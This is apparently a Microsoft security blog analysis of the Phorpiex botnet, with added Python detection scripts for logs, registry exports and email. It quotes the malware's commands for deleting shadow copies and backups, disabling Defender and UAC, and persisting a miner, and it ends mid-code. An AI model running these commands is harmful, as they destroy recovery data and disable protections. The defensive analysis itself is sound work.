Dedicated research teams in Microsoft stay on top of threats by constantly improving the AI layers that support our threat intelligence which then feeds into our ability to protect against and detect threats. Microsoft Defender for Office 365 protects against email-based threats like phishing and empowers security operations teams to investigate and remediate attacks. Threat data from Defender for Office 365 then increases the quality of signals analyzed by Microsoft 365 Defender, allowing it to provide cross-domain defense against sophisticated attacks.


Justin Grana, Yuchao Dai, Jugal Parikh, and Nitin Kumar Goel

Microsoft 365 Defender Research Team

The post Spotting brand impersonation with Swin transformers and Siamese neural networks appeared first on Microsoft Security Blog.

Phorpiex morphs: How a longstanding botnet persists and thrives in the current threat environment

May 20th, 2021

Phorpiex, an enduring botnet known for extortion campaigns and for using old-fashioned worms that spread via removable USB drives and instant messaging apps, began diversifying its infrastructure in recent years to become more resilient and to deliver more dangerous payloads. Today, the Phorpiex botnet continues to maintain a large network of bots and generates wide-ranging malicious activities.

These activities, which traditionally included extortion and spamming activities, have expanded to include cryptocurrency mining. From 2018, we also observed an increase in data exfiltration activities and ransomware delivery, with the bot installer observed to be distributing Avaddon, Knot, BitRansomware (DSoftCrypt/ReadMe), Nemty, GandCrab, and Pony ransomware, among other malware.

The botnet’s geographic targeting for bot distribution and installation expanded, too. Previous campaigns focused on targets in Japan, but more recent activity showed a shift to a more global distribution.

World map showing global distribution of Phorpiex botnet activity

Figure 1. Global distribution of Phorpiex botnet activity

The Phorpiex botnet has a reputation for being simplistic and lacking robustness, and it has been hijacked by security researchers in the past. Its tactics, techniques, and procedures (TTPs) have remained largely static, with common commands, filenames, and execution patterns nearly unchanged from early 2020 to 2021. To support its expansion, however, Phorpiex has shifted some of its previous command-and-control (C2) architecture away from its traditional hosting, favoring domain generation algorithm (DGA) domains over branded and static domains.

This evolution characterizes the role of botnets in the threat landscape and the motivation of attackers to persist and remain effective. The threat ecosystem relies on older botnets with large and diverse networks of compromised machines to deliver payloads at low cost. And while many of the older botnet architectures have been primarily classified as spam delivery mechanisms, these infrastructures are critical for newer, modular delivery mechanisms.

Phorpiex also demonstrates that bots, which are some of the oldest types of threats, continue to affect consumer users but notably bring increasingly serious threats to enterprise networks. Despite being traditionally associated with lower-risk activity like extortion and spamming, Phorpiex operators’ decision to move to more impactful malware and actions is entirely at the whim of the attackers.

Understanding botnets and associated infrastructure, botnet malware, their activities and payloads, and how they evolve provides insight into attacker motivation and helps ensure durable protection against some of the most prevalent threats today. At Microsoft, we continue to conduct in-depth research into these threats. These expert investigations add to the massive threat intelligence that informs Microsoft 365 Defender services and the protections they provide. Microsoft 365 Defender delivers coordinated cross-domain defense against the various malware, emails, network connections, and malicious activity associated with Phorpiex and other botnets.

Distribution, expansion, and operation

Phorpiex’s sprawling botnet operation can be divided into three main portions:

  1. Distribution of the bot loader: The bot loader has been propagated through a variety of means over the years, including being loaded by other malware, freeware, and unwanted programs, or delivered by phishing emails from already-infected bots. Phorpiex has also spread via productivity platforms, as well as via instant messaging and USB drives.
  2. Mailing botnet: In addition to spreading the bot loader via email, the botnet is used to generate currency. It does so via extortion and spam campaigns as well as through a variety of other types of financially motivated malware.
  3. Malware delivery botnet: In recent years, the botnet has been observed installing ransomware, cryptocurrency miners, and other malware types, indicating the expansion of the botnet’s activities by the Phorpiex operators or as part of a malware-as-a-service scheme.

From December 2020 to February 2021, the Phorpiex bot loader was encountered in 160 countries, with Mexico, Kazakhstan, and Uzbekistan registering the most encounters.

Column chart showing top 10 countries with most Phorpiex encounters

Figure 2. Countries with the most encounters of the Phorpiex bot loader

In December 2020 and January 2021, we observed non-weaponized staging of Knot ransomware on Phorpiex servers. In February, we also detected commodity malware such as Mondfoxia (also known as DiamondFox) on these servers. These recent developments indicate new loader and monetization strategies under active development.

The combination of the wide variety of infection vectors and outcomes makes the Phorpiex botnet appear chaotic at first glance. However, for many years Phorpiex has maintained a consistent internal infrastructure using similar domains, command-and-control (C2) mechanisms, and source code.

The wide range of infection vectors used by Phorpiex requires a unified security approach that ensures protection is delivered on the endpoint, network, email, and applications. Microsoft 365 Defender’s advanced threat protection technologies detect malicious activity in each of these domains. Moreover, the correlation of these cross-domain threat data surfaces additional malicious activity, allowing Microsoft 365 Defender to provide coordinated and comprehensive protection against Phorpiex.

Bot distribution and installation

Phorpiex maintains and expands its network of bot-infected computers by distributing the Phorpiex bot loader. In 2020 and 2021 we observed the bot loader being spread through Phorpiex bot-delivered emails with .zip or other archive file attachments, downloaded from fake download sites for software (such as photo editing software, screensaver, or media players), or downloaded by other malware also delivered through email. These multiple entry points demonstrate the modular nature of the malware economy.

Regardless of distribution mechanism, however, the bot loader operates in a fairly uniform fashion. It uses three distinct types of C2 to fulfil different goals during and after installation:

  • Downloading the Phorpiex malware implant
  • Downloading updates to the Phorpiex implant and new exploit modules
  • Checking in with C2 infrastructure to deliver cryptocurrency or return data

The malware implant is initially downloaded from sites such as trik[.]ws (historically) or, more recently, a malware hosting repository, worm[.]ws. We are also noticing a shift to using more dedicated IP-based C2 and delivery sites, such as 185[.]215[.]113[.]10 and 185[.]215[.]113[.]8. A notable Phorpiex behavior is the downloading of numbered modules, typically numbered 1-10, with URL paths such as <domain>.com/1, <domain>.com/2, <domain>.com/3, continuing this pattern for as many additional components as needed. As these downloads do not happen through standard web traffic, network-level protection is necessary to prevent malicious downloads. In a very recent development, we observed that most Phorpiex bot loader malware has abandoned branded C2 domains and moved completely to using IPs or DGA domains. However, as in the past, the operators neglected to register all the potential sites that the DGA domains resolve to.

When downloaded and run, the implant attempts to connect to legitimate external sites like WIPMANIA.com to get IP information. It does this repeatedly during subsequent check-ins, and then begins connecting to hardcoded C2 servers. During these check-ins, the implant checks the device’s regional settings and exits if it’s operating in a non-desired region, such as Ukraine. Favored regions include countries in East Asia as well as English-speaking countries.

The loader modules and updates are pulled from a variety of attacker-owned domains. These domain names typically begin with a second-level domain (2LD) of TLDR, TSRV, or THAUS and end with an assortment of unorthodox TLDs such as .WS, .TOP, .RU, .CO, .TO, .SU, .CC, and .IO. As has been pointed out by other researchers, TSRV and TLDR are likely references to “Trik Server” or “Trik Loader”, as many of the internals of the malware use Trik as a proprietary name.
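Both of the traits just described, the numbered module pulls (/1, /2, /3 from one host) and the TLDR/TSRV/THAUS naming with unusual TLDs, are cheap to look for in proxy logs. The Python below is an added example, not Microsoft's code: it parses a constructed, simplified proxy log format (`<time> <client> <method> <url> <status>`, an assumption for this example), flags clients that fetch three or more bare-integer paths from a single host (the threshold is an assumption), and flags hosts matching the naming pattern or the two 185.215.113.x addresses mentioned above. The domain tsrvexample.ws in the sample log is made up for the example.

```python
"""Spot Phorpiex-style module pulls and C2 naming in proxy logs.

Added example, not Microsoft's code. Indicators come from the post
(bare-integer module paths, TLDR/TSRV/THAUS second-level labels with the
listed TLDs, the two 185.215.113.x hosts); the log format, the threshold
and the sample lines are constructed for this example.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

PHORPIEX_2LD_PREFIXES = ("tldr", "tsrv", "thaus")
PHORPIEX_TLDS = {"ws", "top", "ru", "co", "to", "su", "cc", "io"}
PHORPIEX_C2_IPS = {"185.215.113.10", "185.215.113.8"}
MIN_NUMBERED_MODULES = 3  # assumption: three distinct numbered paths from one host

# Constructed format: "<ISO time> <client ip> <method> <url> <http status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse_line(line):
    """Return a dict for one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    parsed = urlparse(url)
    return {"ts": ts, "client": client, "method": method,
            "host": parsed.hostname or "", "path": parsed.path, "status": int(status)}


def suspicious_c2_host(host):
    """True for the listed C2 IPs or for <tldr|tsrv|thaus>*.<unusual tld> names."""
    if host in PHORPIEX_C2_IPS:
        return True
    labels = host.lower().split(".")
    if len(labels) < 2:
        return False
    second_level, tld = labels[-2], labels[-1]
    return second_level.startswith(PHORPIEX_2LD_PREFIXES) and tld in PHORPIEX_TLDS


def find_numbered_module_downloads(events, minimum=MIN_NUMBERED_MODULES):
    """Map (client, host) -> sorted module numbers for clients that fetched
    at least `minimum` distinct bare-integer paths (/1, /2, ...) from a host."""
    seen = defaultdict(set)
    for e in events:
        m = re.fullmatch(r"/(\d+)", e["path"])
        if m and e["status"] == 200:
            seen[(e["client"], e["host"])].add(int(m.group(1)))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= minimum}


def analyse(lines):
    """Return (finding, client, detail) tuples, one per client/host pair."""
    events = [e for e in map(parse_line, lines) if e]
    findings, reported = [], set()
    for e in events:
        pair = (e["client"], e["host"])
        if suspicious_c2_host(e["host"]) and pair not in reported:
            reported.add(pair)
            findings.append(("phorpiex_c2_host", e["client"], e["host"]))
    for (client, host), numbers in find_numbered_module_downloads(events).items():
        findings.append(("numbered_modules", client, f"{host} paths {numbers}"))
    return findings


# Constructed sample: one client pulling numbered modules from a listed IP and
# then reaching a TSRV-style domain (tsrvexample.ws is made up), plus benign
# traffic that must not fire (a single /1 path, a non-listed TLD).
SAMPLE_LOG = [
    "2021-02-03T10:00:01Z 10.0.0.15 GET http://185.215.113.10/1 200",
    "2021-02-03T10:00:02Z 10.0.0.15 GET http://185.215.113.10/2 200",
    "2021-02-03T10:00:03Z 10.0.0.15 GET http://185.215.113.10/3 200",
    "2021-02-03T10:00:09Z 10.0.0.15 GET http://tsrvexample.ws/upd 200",
    "2021-02-03T10:01:00Z 10.0.0.22 GET https://www.example.com/1 200",
    "2021-02-03T10:01:05Z 10.0.0.22 GET https://www.example.com/docs 200",
    "2021-02-03T10:02:00Z 10.0.0.22 GET https://www.tsrv-notes.example/page 200",
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

The naming check deliberately keys on the second-level label plus a TLD allowlist rather than on the exact domains, since the post notes the operators rotate through DGA output; the numbered-path check needs three distinct modules from one host so that a single `/1` on a legitimate site does not fire.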

Regular connections to these attacker-owned domains continue during infection, such that devices that have been infected for months receive new loader versions and capabilities. Modules downloaded from C2 can include additional malware, ransomware, cryptocurrency mining functionality, worming functionality, and the Phorpiex mailing botnet functionality. It is most common for a bot to be participating in mailing and crypto mining, as these seem to be driving revenue generation for the operators during non-ransomware initiatives.

The bot also establishes persistence and attempts to disable security controls. This includes modifying registry keys to disable firewall and antivirus popups or functionality, overriding proxy and browser settings, setting the loader and executables to run at startup, and adding these executables to the authorized application lists. A sample of the keys changed is below, with minor changes from version to version of the loader:

  • \FirewallPolicy\StandardProfile\AuthorizedApplications\List
  • \Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Services
  • \Microsoft\Security Center\AntiVirusOverride
  • \Microsoft\Security Center\AntiVirusDisableNotify
  • \Microsoft\Security Center\FirewallOverride
  • \Microsoft\Security Center\FirewallDisableNotify
  • \Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
  • \Microsoft\Security Center\UpdatesOverride
  • \Microsoft\Security Center\UpdatesDisableNotify
  • \Microsoft\Windows NT\CurrentVersion\SystemRestore
  • \Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
  • \Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
  • \Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable

Enabling tamper protection in Microsoft Defender for Endpoint prevents the bot from making modifications related to Microsoft Defender services. Microsoft Defender for Endpoint automatically cleans up changes made by the bot (if any) during threat cleanup and remediation. Security operations teams can use advanced hunting capabilities to locate these and similar modifications. Administrators can also disable “Local Policy Merge” to prevent local firewall policies from taking effect over group policies.

As the bot loader updates, the key values change to reflect new files, randomized file paths, and masqueraded system files. The example below illustrates a change from SVCHOST to LSASS:

KEY NAME: HKEY_CURRENT_USER\[ID]\Software\Microsoft\Windows\CurrentVersion\Run
OLD VALUE: C:\1446621146296\svchost.exe
NEW VALUE: C:\19197205241657\lsass.exe
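To audit a host, or a registry export collected during incident response, for the tamper settings listed above and for the masqueraded Run entry in the example, the following Python is an added example and not Microsoft's code. It parses the text of a `reg export` file (the constructed sample mirrors the keys from the post; a real export is UTF-16LE with a BOM and should be decoded before parsing), then reports non-zero Security Center override switches, Defender real-time protection disable switches, and Run or firewall-exception entries that name a system binary such as svchost.exe or lsass.exe outside C:\Windows\System32. The numeric directory name follows the post; the OneDrive entry is constructed benign data, and the finding categories are my own.

```python
"""Audit a `reg export` text for the Phorpiex tamper settings listed above.

Added example, not Microsoft's code. Key names and the numeric run-path
come from the post; the parser, finding categories and sample export are
constructed for this example. Real exports are UTF-16LE with a BOM:
read them with open(path, encoding="utf-16") before calling parse_reg_export.
"""
import re
from pathlib import PureWindowsPath

SECURITY_CENTER_OVERRIDES = {
    "AntiVirusOverride", "AntiVirusDisableNotify", "FirewallOverride",
    "FirewallDisableNotify", "UpdatesOverride", "UpdatesDisableNotify",
}
DEFENDER_RTP_SWITCHES = {
    "DisableBehaviorMonitoring", "DisableOnAccessProtection", "DisableScanOnRealtimeEnable",
}
# System binary names the post reports Phorpiex masquerading as.
MASQUERADED_SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "taskhost.exe"}

VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def parse_reg_export(text):
    """Parse export text into {key_path: {value_name: (kind, data)}}.

    Handles "name"="string" and "name"=dword:hex forms; anything else is kept
    as ("raw", text). Multi-line hex(...) continuations are not reassembled.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if not m or current is None:
            continue
        name = m.group(1) if m.group(1) is not None else "@"
        data = m.group(2)
        if data.startswith("dword:"):
            keys[current][name] = ("dword", int(data[6:], 16))
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            unescaped = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            keys[current][name] = ("string", unescaped)
        else:
            keys[current][name] = ("raw", data)
    return keys


def _exe_path(command):
    """First token of a Run value: the quoted path, or text up to the first space."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def _masquerades_system_binary(path):
    """A system binary name living outside C:\\Windows\\System32."""
    p = PureWindowsPath(path)
    in_system32 = str(p.parent).lower().startswith("c:\\windows\\system32")
    return p.name.lower() in MASQUERADED_SYSTEM_NAMES and not in_system32


def audit(keys):
    """Return (category, key, value_name, data) for each tamper indicator."""
    findings = []
    for key, values in keys.items():
        lk = key.lower()
        if lk.endswith("\\microsoft\\security center"):
            for name, (kind, data) in values.items():
                if name in SECURITY_CENTER_OVERRIDES and kind == "dword" and data != 0:
                    findings.append(("security_center_override", key, name, data))
        elif lk.endswith("\\windows defender\\real-time protection"):
            for name, (kind, data) in values.items():
                if name in DEFENDER_RTP_SWITCHES and kind == "dword" and data != 0:
                    findings.append(("defender_rtp_disabled", key, name, data))
        elif lk.endswith("\\currentversion\\run"):
            for name, (kind, data) in values.items():
                if kind == "string" and _masquerades_system_binary(_exe_path(data)):
                    findings.append(("masqueraded_run_entry", key, name, data))
        elif lk.endswith("\\authorizedapplications\\list"):
            for name, (kind, data) in values.items():
                if kind == "string" and _masquerades_system_binary(data.split(":*:")[0]):
                    findings.append(("masqueraded_firewall_exception", key, name, data))
    return findings


# Constructed export mirroring the keys named in the post; the OneDrive entry
# is benign filler that must not be flagged.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride"=dword:00000001
"AntiVirusDisableNotify"=dword:00000001
"FirewallOverride"=dword:00000001
"UpdatesOverride"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection]
"DisableBehaviorMonitoring"=dword:00000001
"DisableOnAccessProtection"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Host Process for Windows Services"="C:\\19197205241657\\lsass.exe"
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\19197205241657\\lsass.exe"="C:\\19197205241657\\lsass.exe:*:Enabled:Host Process for Windows Services"
"""

if __name__ == "__main__":
    for finding in audit(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(finding)
```

With tamper protection on, the Security Center and Defender switches should never read non-zero on a managed host, so any hit from the first two categories is worth treating as a tamper attempt rather than a configuration drift.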

At varying intervals, the bot implant collects lists of files and exfiltrates that data to external IP addresses leased by the attacker, many of which also serve as C2. When additional malware is installed, the pull is initiated from the implant itself. The malware is staged on the Phorpiex operators’ servers prior to new campaigns or on the shared sites such as worm[.]ws.

The bot checks in routinely, often weekly and sometimes even daily. It does this to upload any outcomes from the various modules that the bot installs, such as coin mining deposits or spam activity.

In addition to detecting and blocking the bot malware through its endpoint protection platform (EPP) and endpoint detection and response (EDR) capabilities, Microsoft Defender for Endpoint’s network protection defends against botnet activities like connecting to attacker-controlled servers, mimicking system files, and downloading implants and additional payloads.

Self-spreading via remote drives

One of the more unique and easily identifiable Phorpiex behaviors from the period when it spread primarily via USB is a routine check for all connected removable drives. The bot creates a series of hidden folders on those drives with underscore names (e.g., “__”) and then changes the registry attributes to make these appear invisible to the user. The bot then copies all its file configurations into them, including a malicious DriveMgr.exe (a copy of the loader) as well as a .lnk file that runs the malware when opened. This activity has been largely consistent since 2019. This functionality is a self-spreading mechanism that serves as a backup way to expand the bot implant base. Commands consistent with this Phorpiex worming activity are:

  • ShEllExECutE=__\\DriveMgr.exe
  • "cmd.exe" /c start __ & __\DriveMgr.exe & exit

Microsoft Defender for Endpoint offers multiple layers of protection against USB threats. These include real-time scanning of removable drives and an attack surface reduction rule that blocks untrusted and unsigned processes that run from USB. Microsoft Defender for Endpoint also enables organizations to monitor and control removable drives, for example by allowing or blocking USB devices based on granular configurations and by monitoring USB activity.

Phorpiex as a mailing botnet

For several years, Phorpiex used infected machines to deliver extortion, malware, phishing, and other content through large-scale email campaigns. These emails span a large set of lures, subject lines, languages, and recipients, but there are key sets of characteristics that can identify emails sent from the Phorpiex botnet:

  • Spoofed sender domain, sender username, and sender display name
  • Sender domain of 4 random digits
  • Sender username using a generic name with a variety of numbers
  • Subjects or lures referencing singular names, heights and weights, surveillance
  • Body of the message often referencing dating services or extortion material for ransom
  • Presence of Bitcoin, DASH, Ethereum, or other cryptocurrency wallets
  • ZIP files or other file types purporting to be images such as JPG files or photo types

These patterns include language more commonly used in consumer extortion emails, which reference having illicit photos or videos of the recipient. These are also the same lures that are used to distribute the bot installer as well as ransomware or other malware. The messages often include old passwords of individuals gathered from publicly available lists, a method that attackers use to add credibility whether the mail is received in a corporate environment or at home.
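The characteristics listed above can be turned into a small scorer over message metadata. The following Python is an added example and not Defender for Office 365 logic: the message dictionaries, the generic-name-plus-digits username regex, the lure word list, the attachment heuristics and the wallet-address patterns are all assumptions made for this example, and the wallet strings in the sample are placeholders built to match the address shapes, not real addresses.

```python
"""Score an email against the Phorpiex mailing-botnet traits listed above.

Added example, not Defender for Office 365 logic. The message shape, the
username pattern, the lure word list, the attachment heuristics and the
wallet-address patterns are assumptions; sample wallets are placeholders.
"""
import re
from email.utils import parseaddr

SUBJECT_LURE_WORDS = ("video", "camera", "webcam", "recorded", "surveillance",
                      "photo", "height", "weight")
WALLET_PATTERNS = {
    "bitcoin": re.compile(r"\b(?:bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b"),
    "ethereum": re.compile(r"\b0x[a-fA-F0-9]{40}\b"),
    "dash": re.compile(r"\bX[1-9A-HJ-NP-Za-km-z]{33}\b"),
}
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif")
ARCHIVE_OR_SCRIPT_EXTS = (".zip", ".rar", ".7z", ".js")
IMAGE_WORDS = ("photo", "pic", "img", "image")


def phorpiex_email_indicators(msg):
    """Return the names of the traits present in one message dict."""
    reasons = []
    _, address = parseaddr(msg["from"])
    local_part, _, domain = address.rpartition("@")
    # Sender domain whose first label is exactly four digits.
    if re.fullmatch(r"\d{4}", domain.split(".")[0]):
        reasons.append("sender_domain_four_digits")
    # Generic name followed by a run of digits (assumed shape).
    if re.fullmatch(r"[A-Za-z]{3,}\d{2,}", local_part):
        reasons.append("generic_name_plus_digits")
    subject = msg["subject"].lower()
    if any(word in subject for word in SUBJECT_LURE_WORDS):
        reasons.append("extortion_subject_lure")
    for coin, pattern in WALLET_PATTERNS.items():
        if pattern.search(msg["body"]):
            reasons.append(f"{coin}_wallet_in_body")
    # Archive or script attachment presented as an image.
    for filename in msg.get("attachments", []):
        lower = filename.lower()
        if lower.endswith(ARCHIVE_OR_SCRIPT_EXTS) and (
                any(ext in lower for ext in IMAGE_EXTS) or any(w in lower for w in IMAGE_WORDS)):
            reasons.append(f"image_masquerade_attachment:{filename}")
    return reasons


def is_likely_phorpiex(msg, minimum=3):
    """Assumed policy: three or more traits in one message is a hit."""
    return len(phorpiex_email_indicators(msg)) >= minimum


# Constructed messages. The wallet strings are placeholders built to match the
# address shapes, not real addresses; 4821.example and contoso.com are stand-ins.
FAKE_BTC = "bc1qmockwallet" + "0" * 26
FAKE_DASH = "XmockDashAddress" + "1" * 18
SAMPLE_MESSAGES = [
    {
        "from": "Anna Harris <anna7421@4821.example>",
        "subject": "Your webcam recorded video",
        "body": f"I have your video. Send 0.05 to {FAKE_BTC} or {FAKE_DASH} within 48 hours.",
        "attachments": ["photo_anna.jpg.zip"],
    },
    {
        "from": "Accounts Payable <ap@contoso.com>",
        "subject": "Invoice 1043 attached",
        "body": "Please find attached invoice 1043 for March services.",
        "attachments": ["invoice-1043.pdf"],
    },
]

if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print(msg["subject"], "->", phorpiex_email_indicators(msg))
```

No single trait is decisive (plenty of legitimate mail mentions a photo, and a cryptocurrency address alone is not malicious), which is why the policy function requires several traits to co-occur before treating a message as part of this botnet's output.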

Microsoft Defender for Office 365 detects malicious emails sent by the Phorpiex botnet. These include the extortion and phishing emails, as well as messages carrying malware, whether the Phorpiex loader itself or other malware. Microsoft Defender for Office 365 uses AI and machine learning to detect user and domain impersonation, informed by its comprehensive visibility into email threats as well as through in-depth research like this.

Spam and extortion campaigns

Phorpiex is well known for illicit image or video-based extortion phish and spam campaigns, also known as “sextortion”. These campaigns target a large variety of regions and languages, which is a different set of targets from bot distribution activities. These generally do not deliver malware directly. They are meant to collect revenue for the operator by asserting that they have already compromised a device and have access to damaging material regarding the recipient.

Sextortion campaigns have been quite popular in recent years and generally require payment from the victim in cryptocurrency. We observed Phorpiex operators requiring payment primarily through Bitcoin and Dash. An example of the cryptocurrency profit volume from one such campaign, which targeted English-speaking users in late February 2021 with the subject “Payment from your account”, is shown below.

There are several public monitors of extortion wallets operated by Phorpiex, which have seen the operators of the botnet running numerous wallets during any given week. We observed the below example in which an operator requested $950 from users and accumulated over $13,000 in 10 days.

Line graph showing daily amount of cryptocurrency in a particular cryptocurrency address

Figure 3. Cryptocurrency profit volume from a single wallet used in spam extortion campaign in late February 2021. Data from BitInfoCharts.

In late 2020 and early 2021 we also observed this extortion scheme exploiting fears about security vulnerabilities in teleconferencing applications such as Zoom. The messages claimed that such a vulnerability allowed the operators to capture the extortion material.

Screenshot of sample email used in campaign

Figure 4. Example of an extortion email lure from late 2020

Screenshot of sample email used in campaign

Figure 5. Example of a Korean language extortion email lure from early 2021

In addition to the examples above, Phorpiex is often distributed via business email compromise in messages that contain no links or URLs. This hampers many automatic detection capabilities an organization might have in place.

Phishing, malware, and ransomware campaigns

Phorpiex-powered phishing campaigns as well as bot implant installations deliver secondary malware as well as standard extortion and spam. The tactics involving the spread of emails are the same, with the only differences being in the attachments or links. Malware involving malicious Office documents is interspersed with deliveries of the bot implant or direct ransomware deliveries, which are often contained within .ZIP attachments.

Since 2019, many of the malware-carrying emails from Phorpiex have used the same lures, subject lines, and attachment file names. The emails use a randomly generated feminine name in the subject or reference an embarrassing or improperly obtained photo, and either contain extortion or deliver ransomware. As part of the social engineering lure, the malware attachments masquerade as .jpg files or other image file types while actually being .zip or .js files.

Screenshot of sample email campaign

Figure 6. Example of an email lure including malicious ZIP attachment masquerading as an image of an actress

In summer and fall 2020, many new Phorpiex infections began to spread using archive files to deliver BitRansomware and Avaddon. Avaddon only began spreading in mid to late 2020, and its distribution seems to have been tightly coupled with Phorpiex since its inception.

In the month of August 2020, there was also an increase in the number of bot implants installed on devices, corresponding with the ransomware increase. At this time, most instances of ransomware perpetrated by Phorpiex were carried through the bot implant itself.

Phorpiex as malware delivery botnet

In addition to operating as a mailing botnet, Phorpiex has evolved to deliver other malware as well, most notably cryptocurrency mining malware and ransomware.

Cryptocurrency mining malware

In 2019 Phorpiex started utilizing an XMRIG miner to monetize the hosts with Monero. This module is included in almost all bot installations at the time of infection and communicates primarily over port 5555. This behavior might be coupled with other malware, but in this instance, it is associated with the masqueraded system process used by the rest of the Phorpiex implant (i.e., SVCHOST.exe or LSASS.exe).

The miner is downloaded as a module masquerading as WINSYSDRV.exe. It stores its configuration locally and checks it periodically. The miner does this from additional masqueraded system processes injected into legitimate processes to read its configuration and to mine.

The WINSYSDRV.exe file routinely kicks off a series of heavily nested processes preceded by a PING with a long wait, which is intended to avoid sandboxes. This command is shown below:

cmd.exe /C ping [INTERNAL IP] -n 8 -w 3000 > Nul & Del /f /q "C:\ProgramData\PnQssBdbSh\winsysdrv.exe" & "C:\Users\[USER]\AppData\Local\Temp\winsysdrv.exe"

In prior versions, this command utilized the legitimate but hijacked WUAPP.exe process. Recently we have seen NOTEPAD.exe used to read the configuration path, which is a variant of C:\ProgramData\[RandomString]\cfg:

  • "C:\Windows\System32\wuapp.exe" -c "C:\ProgramData\ADwXcSSGvY\cfgi" (2019-2020)
  • "C:\Windows\System32\wuapp.exe" -c "C:\ProgramData\PnQssBdbSh\cfgi" (2020)
  • "notepad.exe" -c "C:\ProgramData\PnQssBdbSh\cfgi" (2020-2021)
  • "notepad.exe" -c "C:\ProgramData\PnQssBdbSh\cfg" (2020-2021)

In addition to mining Monero, versions of the bot loader also upload to Bitcoin wallets. We were able to scrape those addresses via downstream executables dropped by the Phorpiex loader masquerading as SVCHOST.exe or LSASS.exe. Below is an example of the balance in one such wallet address that was active from September to November 2020, embedded in a specific sample.

Line graph showing daily amount of cryptocurrency in a particular cryptocurrency address

Figure 7. Cryptocurrency profit from a single wallet used in a miner dropped on an infected machine from September to November 2020. Data from BitInfoCharts.

In February 2021, infected implants also downloaded additional Ethereum miners. These miners create scheduled tasks labeled “WindowsUpdate” that run the miner every minute. The miners search for graphics cards as well as other resources to use for mining with an ethermine.org mining pool. Here’s an example task creation:

schtasks /create /sc minute /mo 1 /tn WindowsUpdate /tr %TEMP%\System.exe

Microsoft has also observed Phorpiex variants with cryptocurrency-clipping functionality accompanying the installation of the loader. In these instances, the malware checks clipboard values for a valid cryptocurrency wallet ID. If it finds one, it replaces it with its own hardcoded value. This method allows attackers to profit from existing mining installations or prior malware without having to bring in new software or remove old instances.

Microsoft Defender for Endpoint detects and blocks cryptocurrency mining malware and coin mining activity in general. To continue enhancing this detection capability, Microsoft recently integrated Intel Threat Detection Technology (TDT) into Microsoft Defender for Endpoint, allowing our endpoint detection and response capabilities to use silicon-based threat detection to better protect against coin mining malware.

Ransomware

Phorpiex has been associated with multiple ransomware families through the years. Phorpiex either delivers ransomware on behalf of other groups using those operators’ infrastructure or hosts the ransomware itself. The latter is more common in the case of commodity kits like Avaddon and Knot that the Phorpiex operators may develop themselves.

As recently as February 2021, Avaddon was under active development. Like the Phorpiex loader itself, Avaddon performs language and regional checks for Russia or Ukraine before running to ensure only favored regions are targeted.

The initial Avaddon executable is located in the TEMP folder, and it generally uses a series of random characters as the file extension for encrypted files. Before deleting backups and encrypting the drive, it validates that UAC is disabled by checking whether the following registry values are set as shown, modifying them if not:

  • \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
  • \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
  • \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"

After achieving the privilege level needed, encryption usually occurs on the individual machine without lateral movement, though that is subject to change based on the operator’s monetization strategy. The procedure for deleting backups, like most ransomware, is performed with the following commands:

  • cmd /c wmic.exe SHADOWCOPY /nointeractive
  • cmd /c wbadmin DELETE SYSTEMSTATEBACKUP
  • cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  • cmd /c bcdedit.exe /set {default} recoveryenabled No
  • cmd /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  • cmd /c vssadmin.exe Delete Shadows /All /Quiet
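The command lines quoted through this post (the backup deletion sequence just above, the ping-delay self-delete from the miner, the notepad.exe/wuapp.exe -c configuration read, the per-minute schtasks entry, and the __\DriveMgr.exe worm launch) are all visible in process-creation telemetry. The following Python is an added example and not a Microsoft detection: it runs a handful of regular-expression rules over constructed Sysmon-style process events (the event shape, pids and file paths are assumptions) and returns the rule names that fire for each event.

```python
"""Flag Phorpiex/Avaddon command lines in process-creation telemetry.

Added example, not a Microsoft detection. The rule regexes encode the
command lines quoted in the post; the Sysmon-style event dicts, pids and
file paths below are constructed for this example.
"""
import re

RULES = {
    "backup_or_recovery_deletion": re.compile(
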